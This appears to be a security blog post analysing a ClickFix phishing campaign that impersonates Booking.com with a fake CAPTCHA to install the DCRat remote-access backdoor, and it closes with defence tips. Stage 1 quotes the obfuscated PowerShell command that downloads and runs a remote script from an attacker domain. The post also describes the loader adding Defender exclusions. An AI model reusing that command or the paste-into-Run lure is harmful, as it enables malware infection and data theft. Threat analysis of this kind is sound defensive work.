Booking.com? more like Booking.exe: inside a ClickFix email that drops malware

ClickFix keeps evolving, and the latest variant comes with a nasty prize: DCRat downloaded straight from a fake Booking.com help link. Sublime Security’s researchers caught the full chain, from the inbox lure to the final C2 beacons, and their write-up gives us a perfect lab sample to dissect. (sublime.security)

stage 0: the email that sells the lie

• Fake thread for legitimacy – The attack kicks off with a doctored conversation about an apartment rental. A “colleague” allegedly fell ill mid-booking, so the sender (our attacker) needs the target to double-check an accommodation surcharge.

• Brand misuse and look-alike domain – The message references Booking.com, but the hyperlink hides behind extrannet-ruless[.]com, a fresh domain that looks close enough to Booking’s Extranet portal to fool a quick glance.

• Cloudflare warm-up – Clicking the link shows a legitimate Cloudflare Turnstile CAPTCHA first. That lowers suspicion and lets Cloudflare flag the page as “safe.” Right after you pass the real puzzle, a JavaScript-driven fake CAPTCHA loads in its place.

stage 1: clickfix does the clipboard hustle

When the user clicks “I’m not a robot” on the bogus CAPTCHA, JavaScript silently copies an obfuscated PowerShell command to the clipboard:

powERsheLl /nOPR'o' -W h -c "$url='getsyv[.]com';$sCrIpT=Invoke-RestMethod -Uri $url;Invoke-Expression $sCrIpT"

The page then shows two “verification steps”:

1. Press Win + R

2. Press Ctrl + V and hit Enter

Anyone following directions pastes the payload into the Run dialog, launching PowerShell with no further phishing or macro friction.

stage 2: loader script with a side of UAC

• PowerShell reaches getsyv[.]com for a loader that continuously loops until it can run with admin rights.

• The script adds Windows Defender exclusions for C:\Windows\Temp, ensuring future payloads stay off AV radar.

• Next it pulls ckjg.exe from gettsveriff[.]com, saves it as tybd7.exe in Temp, and executes it.

A user-visible UAC prompt does appear, but the preceding “verification” narrative combined with fake Booking branding nudges many recipients to click Yes.

stage 3: dcrat — old RAT, new wrapper

ckjg.exe is DCRat (DarkCrystal), a .NET backdoor dating to 2019 that’s still popular thanks to its cheap one-time license and thriving plugin market. Out-of-the-box it offers:

• command-execution and keylogging

• cookie, password and clipboard theft

• filesystem exfiltration and screenshot capture

The sample’s configuration points to five *.click C2 domains, each registered within days of the campaign. SHA-256 for the binary:

08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198

why clickfix keeps working

1. No macro barriers – Modern Office blocks VBA by default; ClickFix sidesteps email attachment scanning entirely by leaning on the user’s clipboard.

2. Legit brand flow – Real CAPTCHA → fake CAPTCHA → Run prompt creates a believable, fast rhythm.

3. Defender blind spot – Local AV exclusions are added before the malware lands, guaranteeing a clean runway.

detection & defense tips

ClickFix is a master class in turning human impatience into code execution. This variant shows how little infrastructure an attacker needs: two throwaway domains, a PowerShell stager, and an off-the-shelf RAT. Control the clipboard, watch for odd Run-dialog launches, and keep users skeptical of any CAPTCHA that wants keyboard shortcuts.